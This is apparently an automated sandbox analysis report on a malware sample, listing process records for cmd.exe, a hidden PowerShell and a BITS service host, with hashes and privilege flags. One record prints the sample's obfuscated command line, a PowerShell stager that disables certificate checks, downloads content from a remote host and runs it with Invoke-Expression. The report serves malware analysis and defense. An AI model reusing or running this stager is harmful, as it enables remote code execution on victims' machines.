                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Mutex Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Windows UI Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:09:57:21
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
                                                                                    Imagebase:0x460000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:09:57:21
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                                                    Imagebase:0x250000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    Show Windows behavior

                                                                                    Registry Activities

                                                                                    Powershell Activities

                                                                                    Show Windows behavior

                                                                                    Mutex Activities

                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    Show Windows behavior

                                                                                    System Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Windows UI Activities

                                                                                    Process Token Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:09:57:22
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7c8b00000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    Show Windows behavior

                                                                                    System Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    Disassembly

                                                                                    No disassembly